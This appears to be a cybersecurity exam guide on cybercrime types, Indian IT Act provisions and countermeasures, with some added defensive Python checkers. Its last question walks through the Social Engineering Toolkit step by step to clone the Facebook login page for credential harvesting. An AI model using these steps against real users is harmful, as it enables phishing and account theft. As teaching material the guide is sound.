CYBER SECURITY

UNIT - I

Introduction of cybercrime, challenges of cybercrime, classification of cybercrimes — e-mail spoofing, spamming, internet time theft, salami attack/salami technique ...

UNIT - II

Web jacking, online frauds, software piracy, computer network intrusions, password sniffing, identity theft, cyberterrorism, virtual crime
Perception of cyber criminals — hackers, insurgents and extremist groups etc., web servers hacking, session hijacking

UNIT - III

Cybercrime and criminal justice — Concept of cybercrime and the IT Act 2000, hacking, teenage web vandals, cyber fraud and cheating, defamation, harassment and e-mail abuse ... (49 to ...)
... cybercrimes, nature of criminality, strategies to tackle cybercrime and trends ... (60 to ...)

UNIT - IV

The Indian Evidence Act of 1872 vs. Information Technology Act 2000 — Status of electronic records as evidence, proof and management of electronic records, relevancy, admissibility and probative value of e-evidence ... (67 to 74)
Proving digital signatures, proof of electronic agreements, proving electronic messages ... (74 to 86)

UNIT - V

Tools and methods in cybercrime — Proxy servers and anonymizers, password cracking, key loggers and spyware, virus and worms, trojan horses, backdoors ... (87 to 108)

INTRODUCTION TO CYBERCRIME, CHALLENGES OF CYBERCRIME, CLASSIFICATION OF CYBERCRIME — E-MAIL SPOOFING, SPAMMING, INTERNET TIME THEFT, SALAMI ATTACK/SALAMI TECHNIQUE


INTRODUCTION 


Q.1. Give the definition of cybercrime.

Ans. Giving a single definition of cybercrime is very difficult. The definition which was initially given for cybercrime is —

"A crime conducted in which a computer was directly and significantly instrumental."

This definition was not accepted by all, as it gives only a narrow scope for defining "cybercrime".

Another definition given for cybercrime is as follows —

"Any illegal behaviour that targets the security of computer systems and the data processed by them, which is directed by any electronic operation, is called cybercrime."

Besides "computer crime", the term cybercrime has other names also, such as "Internet crime, e-crime, high-tech crime, computer-related crime etc." Computer crime can be defined in a number of ways; some of them are as follows —

(i) If special knowledge of computer technology is essential for the investigation and prosecution of an illegal act, then that illegal act is known as cybercrime.

(ii) Committing any financial fraud against banks/customers etc. using a computational environment.

(iii) Stealing a person's identity by using a computer and the Internet is also a computer crime.
Q.2. What are the challenges of cybercrime ? Explain.
Or
What are the various challenges of cybercrime ? (R.G.P.V., Nov. ...)

Ans. There are many drawbacks regarding cybercrime in India, and cybercrime is prevented from being addressed in India just because of these drawbacks. Most Indians do not report cybercrimes to law enforcement agencies, and besides this many people in our country are not aware of cybercrime.

On the other side there is a big drawback that our law enforcement agencies are neither knowledgeable about nor well equipped for cybercrimes. The law enforcement agencies in our country should be trained. Not all cities of our country have cyber cells. Only some investigating officers within the police force may be well equipped to fight cybercrime.

There is a legal deficiency in our country against cybercrime. Dedicated law enforcement agencies which are fully aware of cybercrime are needed. There are very few cybercrime courts where expertise in cybercrime can be utilized. If a law is not enforced in its true spirit, however effective it is theoretically, then it is of no use. Besides this, another challenge is that the law enforcement machinery is not well equipped to deal with cyberlaw offences. Since the judiciary is an important part of the law, technically savvy judges who are aware of cybercrime are needed in courts. The officers in the cyber cell should be trained and given good technical support and equipment. Judges should also be trained in cyberlaws, because the judicial system preserves law and order in society.

Various laws on cybercrime and appropriate changes in the Indian IT Act are needed. Expeditious handling of cybercrime cases is also needed. Investigating officers of cybercrime should be guided on cyberforensic tools and strategies in our country. Everybody should learn constantly about cybercrime and its ever-growing developments all across the world. It means that training and orientation on cybercrime for the judiciary and the lawyers is needed.

To overcome these challenges there should be workshops or street dramas among the people, so that people become aware of cybercrime and its related laws and acts in our justice system. Conferences and seminars should also be organized in all parts of our country. Some small advertisements and messages about cybercrime and its related frauds should be displayed on televisions or mobiles.


Q.3. Define the term cybercrime. Give the classification of cybercrime. (R.G.P.V., Nov. 2018)

Ans. Cybercrime — Refer to Q.1.

Classification of Cybercrime — The classification of cybercrime is as follows —

(i) Cybercrime in Narrow Sense — In this classification the role of the computer is as an object, i.e. the target of the crime is the information stored on a computer or the computer itself. e.g., Hacking, DDoS attacks, computer sabotage etc.

(ii) Cybercrime in Broad Sense — In this classification the role of the computer is as the environment or context. No substantial role is played by the computer or the information stored on it in the act of crime, but the computer contains the evidence of the crime. e.g., Bank robbery or murder carried out using computer techniques.

Besides this, the classification of cybercrime is also done on the basis of different categories of crime. This classification is shown in fig. 1.1.

Classification of Cybercrime

Cybercrime Against Individual — E-mail spoofing, Online frauds, Spamming, Phishing, Cyberstalking and harassment, Cyberdefamation, Computer sabotage, Password sniffing.

Cybercrime Against Property — Credit card frauds, Intellectual property crimes, Internet time theft.

Cybercrime Against Organization — Hacking, Password sniffing, E-mail bombing, Virus attacks, Salami attacks/Salami techniques, DoS attacks, Logic bomb, Trojan horse, Software piracy, Computer network intrusion.

Cybercrime Against Society — Forgery, Cyberterrorism, Web jacking.

Fig. 1.1 Classification of Cybercrime

Q.4. Explain the categories of cybercrime.

Ans. Categorization of cybercrime is as follows —

(i) Crime Targeted Against Individuals — These kinds of crime exploit human weaknesses like greed and naivety. Financial frauds, sale of non-existent items, child pornography, harassment, copyright violation etc. are examples of this crime. As the Internet develops day by day, criminals are exploiting it with new tools that reach a large number of victims.

(ii) Crime Targeted Against Property — The stealing of mobile devices falls in this category. Cell phones, laptops, personal digital assistants (PDAs) and removable media (CDs and pen drives); transmitting harmful programs that can disrupt the functions of systems and/or wipe out the data on the hard disk etc., are the examples of this type of crime.

(iii) Crime Targeted Against Organizations — Crime against a government/organization includes cyberterrorism. In this crime computers and the Internet are used to terrorize the citizens of a country by stealing or hacking private information and also by damaging programs.

(iv) Cybercrime as a Single Event — In this crime a single attack is performed on the victim's system, e.g., opening an attachment that may contain a virus and infect the system. This crime includes hacking or fraud.

(v) Cybercrime as a Series of Events — In this crime the attackers attack the victim's system repeatedly, e.g., interacting with the victim on phone and/or via online chat to establish a relationship first; this relationship is then exploited to commit sexual assault.


Q.5. Write a short note on e-mail spoofing. (R.G.P.V., Nov. 2018)
Or
Write a short note on IP spoofing. (R.G.P.V., Dec. 2003, June 2004, Dec. 2010, June 2011)
Or
What do you understand by IP-spoofing ? (R.G.P.V., June 2017)
Or
What do you mean by IP spoofing ? (R.G.P.V., Nov. 2019)

Ans. The most common type of spoofing that you are likely to encounter is IP spoofing, used primarily to spoof the source address of e-mail. In this case, an e-mail message looks like it comes from one address, when in fact it comes from somewhere else instead. The intent is to trick the user into thinking the e-mail comes from a trusted source, so that the user will open the e-mail and act on it in some way.

E-mail spoofing can be used to —

(i) Deliver a phishing message (one that cons the user into divulging confidential information). Replying to the e-mail won't work properly, but clicking on links in the e-mail will take the user to a spoofed Web site.

(ii) Deliver a malware payload, such as a virus, worm, or Trojan horse. The malware may come as an attachment that must be downloaded (and perhaps executed), or may be coded into the e-mail so that all the user needs to do is open the e-mail. (The malware installs itself when the e-mail is opened.)

One of the more annoying e-mail spoofing tricks is to use the contents of the e-mail address book on a compromised machine as the sources of spoofed e-mail. If you happen to receive a reply to an e-mail you never sent, then you know that your address has been harvested and used in spoofed e-mail. The response generated by a spoofed e-mail works like this: the spoofed e-mail was infected with a virus. On the target machine the mailer daemon caught the virus and refused the delivery of the e-mail. The response e-mail was sent to the spoofed address, surprising the recipient, because the owner of the spoofed address never sent the e-mail with the attached virus.

A spoofed e-mail is easy to detect by examining the e-mail header information, and this is something a technologically savvy user can be trained to do. In other spoofing attacks, however, we cannot stop the spoofer from sending the spoofed message.

Q.6. What are the various ways to avoid e-mail spoofing ?

Ans. If the users of an organization are not knowledgeable enough to understand an e-mail header, then there are some other ways, given below, that can be used to avoid much of the damage from e-mail spoofing —

(i) Users can be trained not to download attachments from untrusted sources. Depending on the nature of the organization, e-mail attachments can be blocked.

(ii) Users of the organization should avoid address book software, such as Microsoft Outlook, that is vulnerable to harvesting by malware. This can go a long way to prevent the addresses in an address book from being used as spoofed addresses.

(iii) Users can be taught to be skeptical about e-mail that promises something that is too good to be true, even if that e-mail appears to come from a trusted source. The source could be spoofed.

(iv) Remind users frequently that well-known sites like PayPal, Paytm etc. never ask for confidential information in an e-mail, nor do they provide links in e-mail to pages that ask for such data. If a user wants to use such an option, he or she should use the browser directly.

On the other hand, the e-mail server software should be updated frequently, so that it has the most recent virus filters.
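The header examination that Q.5 and Q.6 recommend can be automated. The following is an added example, not code from the book: it parses two constructed messages with Python's standard `email` library and reports the inconsistencies a spoofed sender usually leaves behind (envelope sender, Reply-To and first Received hop not matching the visible From domain, and SPF/DKIM/DMARC verdicts that did not pass). Header values, host names and addresses are all constructed sample data.

```python
"""Examine e-mail headers for the inconsistencies a spoofed sender leaves behind."""
import re
import email
from email import policy
from email.utils import parseaddr

# Constructed sample of a spoofed message: the visible From: claims a bank, but the
# envelope sender, the Reply-To and the first-hop Received: line all point elsewhere,
# and the receiving server's SPF/DKIM/DMARC checks did not pass.
SPOOFED_RAW = """\
Return-Path: <bulk-4417@mailer.example.net>
Received: from mailer.example.net (unknown [198.51.100.23])
\tby mx.victim.example (Postfix) with ESMTP id 3F2A1
\tfor <user@victim.example>; Mon, 6 May 2024 09:12:01 +0000
Authentication-Results: mx.victim.example; spf=fail smtp.mailfrom=mailer.example.net;
\tdkim=none; dmarc=fail header.from=bank.example
From: "Bank Support" <support@bank.example>
Reply-To: <verify-account@example.org>
To: <user@victim.example>
Subject: Urgent: confirm your account

Please confirm your account by replying to this message.
"""

# Constructed sample of a consistent, authenticated message for comparison.
CLEAN_RAW = """\
Return-Path: <support@bank.example>
Received: from mail.bank.example (mail.bank.example [203.0.113.10])
\tby mx.victim.example (Postfix) with ESMTP id 9C0D2
\tfor <user@victim.example>; Mon, 6 May 2024 10:00:00 +0000
Authentication-Results: mx.victim.example; spf=pass smtp.mailfrom=bank.example;
\tdkim=pass header.d=bank.example; dmarc=pass header.from=bank.example
From: "Bank Support" <support@bank.example>
To: <user@victim.example>
Subject: Your monthly statement

Your statement is available in the online banking portal.
"""


def domain_of(header_value) -> str:
    """Lower-case domain of an address header such as 'Name <user@host>'; '' if absent."""
    if header_value is None:
        return ""
    _, address = parseaddr(str(header_value))
    return address.rsplit("@", 1)[1].lower() if "@" in address else ""


def first_hop_host(msg) -> str:
    """Host named after 'from' in the earliest Received: line (the MTA that handed the mail in)."""
    received = msg.get_all("Received") or []
    if not received:
        return ""
    match = re.match(r"\s*from\s+(\S+)", str(received[-1]))  # last header = earliest hop
    return match.group(1).lower() if match else ""


def auth_results(msg) -> dict:
    """Collect spf=/dkim=/dmarc= verdicts from Authentication-Results headers."""
    verdicts = {}
    for value in msg.get_all("Authentication-Results") or []:
        for method, verdict in re.findall(r"\b(spf|dkim|dmarc)=(\w+)", str(value)):
            verdicts[method] = verdict.lower()
    return verdicts


def spoofing_indicators(raw: str) -> list:
    """Return human-readable reasons the message looks spoofed; [] means the headers agree."""
    msg = email.message_from_string(raw, policy=policy.default)
    from_dom = domain_of(msg.get("From"))
    findings = []

    envelope_dom = domain_of(msg.get("Return-Path"))
    if envelope_dom and envelope_dom != from_dom:
        findings.append(f"envelope sender domain {envelope_dom} differs from From domain {from_dom}")

    reply_dom = domain_of(msg.get("Reply-To"))
    if reply_dom and reply_dom != from_dom:
        findings.append(f"Reply-To domain {reply_dom} differs from From domain {from_dom}")

    hop = first_hop_host(msg)
    if hop and hop != from_dom and not hop.endswith("." + from_dom):
        findings.append(f"first Received hop {hop} is not a host under {from_dom}")

    verdicts = auth_results(msg)
    for method in ("spf", "dkim", "dmarc"):
        if verdicts.get(method) != "pass":
            findings.append(f"{method} did not pass ({verdicts.get(method, 'missing')})")
    return findings


if __name__ == "__main__":
    for label, raw in (("spoofed", SPOOFED_RAW), ("clean", CLEAN_RAW)):
        print(label, spoofing_indicators(raw) or ["no indicators"])
```

A mail gateway can add the same findings as a warning banner, so that the skeptical reading Q.6 asks of users is supported by evidence from the headers themselves.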


Q.7. What do you mean by spamming ? Explain in brief.

Ans. It is not easy to define spam. The process of forging an e-mail with other content without the user's knowledge is known as spamming, and these types of mails are known as spams. These types of mails are assumed to be a typical example of abuse. Some people call these unsolicited commercial mail. But sometimes we desire and feel happy when we get unsolicited mails. Some people call spam automated commercial mail. But there were many mails that were unsolicited and sometimes automated and not commercial in nature. Hence, covering all these aspects, we can define spams as unsolicited and automated e-mails.

Since e-mail accounts for more than 80% of Internet use, e-mail spamming affects a large number of Internet users. Because of economic factors spamming is difficult to control. Since advertisers do not have to pay any amount for the management of mailing lists, it is difficult to hold senders accountable for their mass mailings. Since the barrier to entry is not so high, the amount of unsolicited mail has increased very much even though there are few spammers. The costs of lost productivity and fraud from spams are borne by the people and Internet service providers.

Another example of spamming is 'search engine spamming', in which a document is created or altered with the motive of misleading an electronic catalog or filing system. Those who continually attempt to spam a search engine can be excluded from the search index. To avoid being excluded, we should avoid the following web publishing techniques —

(i) Keywords should not be repeated.
(ii) Keywords that are not related to the contents of the site should not be used.
(iii) There should be no IP cloaking.
(iv) Coloured text on a background of the same colour should not be used.
(v) There should be no hidden links.


Q.8. How can we avoid spamming ?

Ans. There are several ways to avoid spamming, some of which are as follows —

(i) Limitation of E-mail Addresses Posted in a Public Electronic Place — Targets of spammers are the e-mail addresses posted at the bottom of personal web pages. These addresses are harvested simply by cruising the Internet hunting for them. If we must put a personal e-mail address on a personal web page, find a way of disguising it. We should opt out of job and professional sites that place member e-mail addresses online.

(ii) Stop Ourselves from Filling Out Online Forms that Require E-mail Addresses — We should avoid, if we can, giving our e-mail addresses while filling in any kind of form, including online forms that ask for them. We should fill in an e-mail address only when replies are to be received online.

(iii) Use of E-mail Addresses Not Easy to Guess — We know that passwords can be guessed successfully, and now spammers are also trying to guess e-mail addresses. To do this they start by sending mails to addresses with short-stem personal fields on common ISPs such as Yahoo, Gmail, Hotmail etc.

(iv) Use Multiple E-mail Addresses — We should use one e-mail address strictly for business purposes and multiple e-mail addresses for other purposes. We can use a different e-mail address while filling in forms for various personal, business and pleasure purposes. By doing so it will be easy to identify who sells our e-mail addresses: noting on which form and to whom each address was used, one can easily track who is causing the spam. Now there are one-time disposable e-mail addresses which can be used with little effort.

(v) Spam Filtering — Spam filters should be used either at the network level or at the application level to block unwanted e-mails. In both cases the spam is prevented from reaching the user by the filter. Many Internet service providers are offering spam filters.
Q.9. Define the term cyberstalking. How can we tackle this cybercrime ? (R.G.P.V., Nov. 2018, 2019)

Ans. The word cyberstalking is made of two words — Cyber and stalking. Cyber means the information and communication technologies such as the Internet, while stalking means the act of watching or following someone for a long period of time. So cyberstalking is defined as an individual or group of individuals using information and communication technologies to harass another person or group of persons. The examples of cyberstalking are as follows —

(i) False accusation

(ii) Monitoring and transmission of threats

(iii) Soliciting minors for sexual purposes

(iv) Gathering information about someone in order to harass him/her

(v) Damaging data or equipment.

Cyberstalking also involves repeated harassment and threatening by an individual who uses the Internet as the communication medium. Most of the victims of cyberstalking are women and most cyberstalkers are men, but there are some cases where the victims are men and the cyberstalkers are women.

There are also cases in which the cyberstalker has a prior relationship with the victim, and when this relationship goes wrong cyberstalking begins, e.g., boss/subordinate, neighbour etc. Cyberstalking can be tackled in the following ways —

(i) Do not disclose personal information such as phone number, address, background etc. in public places, where anyone could access this information.

(ii) If someone tries to establish a connection with the victim by making calls or sending messages, it should be reported to the nearest police station or cybercrime cell.

(iii) If someone is sending repeated e-mails asking for favours, do not favour them; report it to the cybercrime cell or police station.
Q.10. Explain the working procedure of cyberstalking.

Ans. The following are the ways in which cyberstalking works —

(i) Repeated e-mails are sent to the victim, asking them for various kinds of favours or harassing them.

(ii) The victims are contacted through e-mails by sending them letters that threaten them or can sexually exploit them. The name and mail Id of the stalker may not be real.

(iii) The cyberstalker collects the personal information of the victim, such as address, family details, telephone numbers of residence as well as office, mobile number, e-mail Id etc.

(iv) Stalkers try to establish a connection to the victim through mobile/telephone, and if the connection is established they start to make calls to the victim to harass or threaten them.

(v) The victim's personal information can be posted on any illegal site, such as a sex worker's service website or dating services etc. They post the information as if the victim were posting it, inviting people to call the victim on the given contact details for sexual services.

(vi) The people who come across the information ask the victim for sexual services or relationships by contacting them on the given details.

(vii) Since the victim's e-mail account is registered on pornographic and sexual sites by the stalker, the victim receives such unsolicited e-mails.
Q.11. What do you mean by Internet time theft ? Explain.

Ans. In these days the use of the Internet has become a necessity for everyone. But if the Internet time we paid hard money for is being stolen by an unauthorized person, then what should we do ? When an unauthorized person uses the Internet hours of another person who has paid for them, it is called Internet time theft. The unauthorized person gets access to another person's ISP user ID and password either by hacking or by illegal means without that person's knowledge, so this act comes under hacking. We can identify time theft if our Internet time has to be recharged frequently while our use of the Internet is infrequent. Internet time theft is a crime related to the crime conducted through "identity theft".

Identity theft involves both theft and fraud, therefore the provisions with regard to forgery as provided under the IPC, 1860 are often invoked along with the IT Act 2000.

The Information Technology Act (IT Act), 2000 is the main act which deals with the legislation in India for governing cybercrimes. Some sections of the IT Act 2000 dealing with cyber theft are —

(i) Section 43 — If without permission of the owner any person damages a computer, computer system or computer network, then he/she shall be liable to pay compensation to the person so affected.

(ii) Section 66 — If any person, dishonestly or fraudulently, does any act referred to in Section 43, he/she shall be punishable with imprisonment for a term which may extend to three years or with fine which may extend to ₹5 lakh or with both.

(iii) Section 66B — If a person dishonestly receives stolen computer resource or communication device, he/she shall be liable for punishment with imprisonment for a term which may extend up to three years or with fine which may extend to rupees one lakh or with both.

(iv) Section 66C — The person who fraudulently or dishonestly makes use of the electronic signature, password or any other unique identification feature of any other person shall be punished with imprisonment of either description for a term which may extend up to three years and shall also be liable to a fine which may extend to one lakh rupees.

(v) Section 66D — It was inserted to punish cheating by impersonation using computer resources.


Q.12. What is the salami attack ? How can information be gathered through the salami technique ? (R.G.P.V., Nov. 2018)

Ans. A salami attack is a fraudulent action of altering systems for committing financial crimes. These alterations are so insignificant that nobody will notice them. The alterations in the systems can be done by either modification or insertion of a malicious program, and the main motive of this is financial gain. The salami attack is considered a minor attack that can be repeated many times.

e.g., a very small amount of money can be stolen from each customer's account in a particular bank. For this purpose a bank employee can modify the program to deduct a small amount from each customer's account every month, and by doing so the employee will make a sizable amount every month. The amount will be so small (say ₹1) that no customer will notice it. This type of attack is used for committing financial fraud; it is common and occurs within finance-related organizations. Such an action will not be noticed by any individual account holder or customer.

The salami technique can also be used to gather information over a period of time to build up a picture of an organization. The distributed information may be about an individual or an organization. A whole database can be built up from data collected from sites, advertisements, and documents collected from trash cans. This data can be intelligence about the target. The amount of misappropriation is just below the threshold of perception, so users might need to be more vigilant. Careful examination of our assets, transactions and every other dealing, including sharing of confidential information, might help reduce the chances of an attack by this method.
Q.13. How can we identify the salami attack ? How can the salami attacks be prevented ?

Ans. The only way to detect a salami attack is to perform rigorous white box testing, in which each and every line of code that is executed is checked. This is the only way to identify the salami attack, but it is a laborious way.

A company that protects personal account information has to be on the lookout for individuals who wish to put it in a compromising position when it comes to another's funds. It is also important to know how to tackle this from an angle that is highly sophisticated. Some of the ways to protect against salami attacks are as follows —

(i) An organization should keep the security of the system as high as possible, so that an attacker cannot take advantage of any loophole. By doing so the attacker will not be familiar with the way the framework is designed.

(ii) Banks should also advise customers to report any kind of money deduction that they were a part of and were not aware of. Whether the amount is small or big, the banks should encourage the customers to come forward and openly tell them that this could be an act of fraud.

(iii) The most important thing is that customers should ideally not store information online when it comes to bank details. But this cannot change the fact that banks rely on a network that has hooked all customers onto a common platform of transactions that requires a database. The safe thing to do is to make sure the bank/website is highly trusted and has not been part of a slanderous past that involved fraud in any way.
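Besides white box testing of the posting program, the ₹1-per-customer skim described in Q.12 can be caught from the ledger alone by recomputing every posting independently and looking for the pattern it leaves: many identical small shortfalls and one account whose unexplained surplus equals their sum. The following is an added example, not code from the book; the interest rule, the 4% rate and the month-end batch are constructed assumptions.

```python
"""Reconcile a month's interest postings against the published rule to spot a salami skim."""
from decimal import Decimal, ROUND_HALF_EVEN

PAISA = Decimal("0.01")
ANNUAL_RATE = Decimal("0.04")  # assumed published savings rate of 4% per annum


def expected_interest(balance: Decimal, annual_rate: Decimal = ANNUAL_RATE) -> Decimal:
    """Monthly interest the bank's published rule should credit, rounded to the paisa."""
    return (balance * annual_rate / 12).quantize(PAISA, rounding=ROUND_HALF_EVEN)


# Constructed month-end batch: (account, balance, interest actually credited).
# Accounts 1001-1008 were each credited ₹1.00 less than the rule gives; the eight
# shaved rupees landed in account 9999, which holds no balance and earns nothing itself.
BATCH = [
    ("1001", Decimal("12500.00"), Decimal("40.67")),
    ("1002", Decimal("8300.50"), Decimal("26.67")),
    ("1003", Decimal("45000.00"), Decimal("149.00")),
    ("1004", Decimal("990.25"), Decimal("2.30")),
    ("1005", Decimal("67000.00"), Decimal("222.33")),
    ("1006", Decimal("3200.00"), Decimal("9.67")),
    ("1007", Decimal("15750.75"), Decimal("51.50")),
    ("1008", Decimal("21000.00"), Decimal("69.00")),
    ("1009", Decimal("5000.00"), Decimal("16.67")),   # untouched customer
    ("9999", Decimal("0.00"), Decimal("8.00")),       # collector account
]


def recompute_postings(batch, annual_rate=ANNUAL_RATE):
    """The batch as it would look if every posting followed the published rule."""
    return [(acct, bal, expected_interest(bal, annual_rate)) for acct, bal, _ in batch]


def audit_interest_batch(batch, annual_rate=ANNUAL_RATE,
                         max_shave=Decimal("1.00"), min_accounts=5):
    """Independent recomputation: many small shortfalls of at most max_shave, plus an
    account whose unexplained surplus covers their sum, is the salami signature."""
    shortfalls = {}
    surpluses = {}
    for account, balance, posted in batch:
        diff = posted - expected_interest(balance, annual_rate)
        if Decimal(0) < -diff <= max_shave:
            shortfalls[account] = -diff
        elif diff > 0:
            surpluses[account] = diff
    total = sum(shortfalls.values(), Decimal(0))
    beneficiaries = sorted(a for a, s in surpluses.items() if total and s >= total)
    return {
        "shaved_accounts": len(shortfalls),
        "total_shaved": str(total),
        "beneficiaries": beneficiaries,
        "suspicious": len(shortfalls) >= min_accounts,
    }


if __name__ == "__main__":
    print(audit_interest_batch(BATCH))
    print(audit_interest_batch(recompute_postings(BATCH)))
```

The recomputation must run outside the posting program, with its own copy of the rate and rounding rule; otherwise a modified program would agree with itself.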

Q.14. Write a short note on cyberdefamation.

Ans. "Harming the reputation of a person either by words that are spoken or intended to be read, or by visible representation, or by publishing any imputation, is said to defame that person."

When the above takes place in electronic form, it is called cyberdefamation. It means that when a person is defamed by either using a computer or the Internet, then it is cyberdefamation.

e.g., A defamatory matter about a person published on the web by someone else.

The rules formed according to IPC section 499 regarding defamation are as follows —

(i) If any kind of imputation harms the reputation of a person and is intended to be hurtful to the feelings of his family, it may be considered as defamation.

(ii) An imputation about a company or an association may be considered as defamation.

(iii) Imputations that do not harm the person's reputation, unless they lower the moral or intellectual character of that person, will not be considered as defamation.

There are two types of defamation, Libel (written defamation) and Slander (oral defamation). Words that injure the reputation of a person of ordinary intelligence will be assumed to defame the person; but if there is no damage to the person's reputation and a person has made an allegation of defamation, then that person may be held liable for defamation.


Q.15. Write short notes on the following —
(i) Data diddling
(ii) Forgery
(iii) Newsgroup spam/crimes emanating from usenet newsgroup
(iv) Industrial spying/industrial espionage.

Ans. (i) Data Diddling — The alteration of raw data just before it is processed by a computer, and changing it back again after the processing is completed, is known as data diddling. When private parties computerized their systems, many Electricity Boards in India became victims of data diddling programs inserted into them.

(ii) Forgery — Sophisticated computers, printers and scanners can be used to forge currency notes, postage and revenue stamps. There are also many institutes outside soliciting the sale of fake marksheets or even degree certificates. These marksheets and degree certificates are made with high-quality computers, printers and scanners. Nowadays it has become a money-growing business involving large monetary amounts given to gangs in exchange for these bogus but authentic-looking certificates.

(iii) Newsgroup Spam/Crimes Emanating from Usenet Newsgroup — This is the earliest form of spamming. The term "spam" meant excessive multiple posting on Usenet. Usenet is now more attractive to spammers than ever because of the invention of Google Groups and its large usenet archive. E-mail spams were actually supported by spamming of usenet newsgroups. The title "Global Alert for All : Jesus is coming soon" was the first recognized usenet spam, and it was posted by Clarence L. Thomas IV, a system admin of Andrews University, on 18 January 1994.

(iv) Industrial Spying/Industrial Espionage — Corporations spy on their rivals just as governments do, so spying is not limited to governments. Better opportunities for espionage are provided by the Internet and widely networked systems. An activity known as "industrial spying" is obtaining information about product finances, research and development and marketing strategies. The industrial spy is as old as industries themselves. Similarly, using the Internet to achieve this is as old as the Internet itself.

Since Trojans and spyware materials are now becoming publicly available, low-skilled people are now expected to generate high profit out of industrial spying. The aspect of industrial spying will be included in the fight against cybercrime.


WEB JACKING, ONLINE FRAUDS, SOFTWARE PIRACY, COMPUTER NETWORK INTRUSIONS, PASSWORD SNIFFING, IDENTITY THEFT, CYBERTERRORISM, VIRTUAL CRIME


Q.1. What is web jacking ? Explain with example.

Ans. The name web jacking is derived from hijacking. This method is used in social media, where a hacker takes control of a website fraudulently. It can be done either by changing the content of the original site or by redirecting the user to another fake, similar-looking page controlled by the hacker. In web jacking the owner of the website has no control, and the attacker may use the website for his own selfish interest, for fulfilling political objectives, or for money. There are many cases where the attacker has asked for ransom and even posted obscene material on the site. A clone of the website can be created using the web jacking method and presented to the victim with a new link saying that the site has moved.

When we hover the cursor over the link provided, the URL presented will be the original one, and not the attacker's site. But when we click on the new link, it opens and is quickly replaced by the malicious web server. Here the name of the site in the address bar will be slightly different from the original website, which can trick users into thinking it is a legitimate site, e.g., "gmail" may direct us to "gmai1", where l is replaced by 1. Obviously it can be seen that it is not "gmail.com", but people still click the link.

Web jacking can also be done by sending a counterfeit message, under a false identity, to the registrar controlling the domain name registration, asking him to connect the domain name to the web jacker's IP address, thus sending unsuspecting consumers who enter that particular domain name to a website controlled by the web jacker. The purpose of this attack is to try to gain the credentials such as user names, passwords and account numbers of users by using a fake web page with a valid link which opens when the user is redirected to it after opening the legitimate site.

e.g., an example of web jacking is messages sent to people to make them believe that they have won a lottery; to claim this amount they are asked to click a link, after clicking which a form opens in which all personal information like name, address, mobile number, telephone number, account and other related information is asked for, and using this information the attackers hack their bank account.
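Two of the tricks described above leave a mechanical trace: the link text naming the real site while the link goes elsewhere, and the "gmai1" substitution in the host name. The following added example (not code from the book) checks a link for both, plus the related trick of burying a trusted name inside a longer attacker-owned domain; the trusted-domain list and the look-alike table are assumptions made for the example.

```python
"""Check a link for the look-alike and mismatched-destination tricks used in web jacking."""
import unicodedata
from urllib.parse import urlsplit

# Assumed list of domains the organisation treats as trusted (the text names gmail and PayPal).
TRUSTED = ("gmail.com", "paypal.com")

# ASCII substitutions a reader easily misses; longest patterns are applied first.
CONFUSABLES = {"rn": "m", "vv": "w", "1": "l", "0": "o"}


def skeleton(host: str) -> str:
    """Reduce a host name to the shape a human perceives: strip accents, fold look-alikes."""
    folded = unicodedata.normalize("NFKD", host.lower())
    folded = "".join(ch for ch in folded if not unicodedata.combining(ch))
    for fake, real in sorted(CONFUSABLES.items(), key=lambda kv: -len(kv[0])):
        folded = folded.replace(fake, real)
    return folded


def registrable(host: str) -> str:
    """Last two labels of a host ('login.gmail.com' -> 'gmail.com'); assumes single-label TLDs."""
    return ".".join(host.split(".")[-2:])


def check_link(display_text: str, href: str, trusted=TRUSTED) -> list:
    """Return the reasons a link looks like a web jacking lure; [] means nothing stood out."""
    target = (urlsplit(href).hostname or "").lower()
    findings = []

    # The "hover shows the real site, click goes elsewhere" case: compare shown vs. actual host.
    if "://" in display_text:
        shown = (urlsplit(display_text).hostname or "").lower()
        if shown != target:
            findings.append(f"link text shows {shown} but the link goes to {target}")

    owner = registrable(target)
    if owner in trusted:
        return findings
    for site in trusted:
        if skeleton(owner) == skeleton(site):
            findings.append(f"{target} is a look-alike of {site}")  # the gmail / gmai1 case
        elif site in target:
            findings.append(f"{target} embeds the trusted name {site} under another domain")
    return findings


if __name__ == "__main__":
    print(check_link("https://www.gmail.com/", "http://www.gmai1.com/login"))
    print(check_link("Click here", "https://gmail.com.accounts-verify.example/"))
```

The same skeleton comparison can be run against a domain registrar's notification feed, so that a newly registered look-alike of the organisation's own domain is noticed before it is used in a lure.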
0.2. Discuss the method of web jacking in detail. 


Ans. The web jacking attack vector isa phishing technique that can be 
used in social engineering engagements. A fake website is created by usin 
this method, and when the victim opens the link a page appears with th 
message that the website has moved and they need to click another link. If the 
victim clicks the link he will be redirected to a fake page that looks real, 

This kind of attack has already been included in Social Engineering Toolkit 
(SET). So now we shall use the SET to implement this method in the following 
steps — 

Step-1 — Firstly we open SET and select option 2, which is the website attack vectors, as shown in fig. 2.1.

    Select from the menu:

    1) Spear-Phishing Attack Vectors
    2) Website Attack Vectors
    3) Infectious Media Generator
    4) Create a Payload and Listener
    5) Mass Mailer Attack
    6) Arduino-based Attack Vector
    7) SMS Spoofing Attack Vector
    8) Wireless Access Point Attack Vector
    9) QR Code Generator Attack Vector
    10) Third Party Modules

    99) Return back to the main menu.

    set> 2

Fig. 2.1 Social Engineering Toolkit


Step-2 — Now in website attack vectors we see a list of the available web attack methods. Here we select option 6, which is the web jacking attack. The list of website attack vectors is shown in fig. 2.2.

    1) Java Applet Attack Method
    2) Metasploit Browser Exploit Method
    3) Credential Harvester Attack Method
    4) Tabnabbing Attack Method
    5) Man Left in the Middle Attack Method
    6) Web Jacking Attack Method
    7) Multi-Attack Web Method
    8) Victim Web Profiler
    9) Create or Import a CodeSigning Certificate

    99) Return to Main Menu

    set:webattack> 6

Fig. 2.2 Website Attack Vector
Step-3 — Now in the web jacking attack menu we have three options — (i) Web templates, (ii) Site cloner, (iii) Custom import. Here we select the site cloner in order to clone the website of our interest. Note that this type of attack works together with the credential harvester method, so we need to choose a website that has username and password fields. The web jacking attack template is shown in fig. 2.3.

    1) Web Templates
    2) Site Cloner
    3) Custom Import

    99) Return to Webattack Menu

    set:webattack> 2
    [*] SET supports both HTTP and HTTPS
    [*] Example: http://www.thisisafakesite.com
    set:webattack> Enter the url to clone: www.facebook.com

    [*] Cloning the website: https://login.facebook.com/login.php
    [*] This could take a little bit...

    The best way to use this attack is if username and password form
    fields are available. Regardless, this captures all POSTs on a website.
    [*] I have read the above message. [*]

    Press {return} to continue.

Fig. 2.3 Web Jacking Attacks


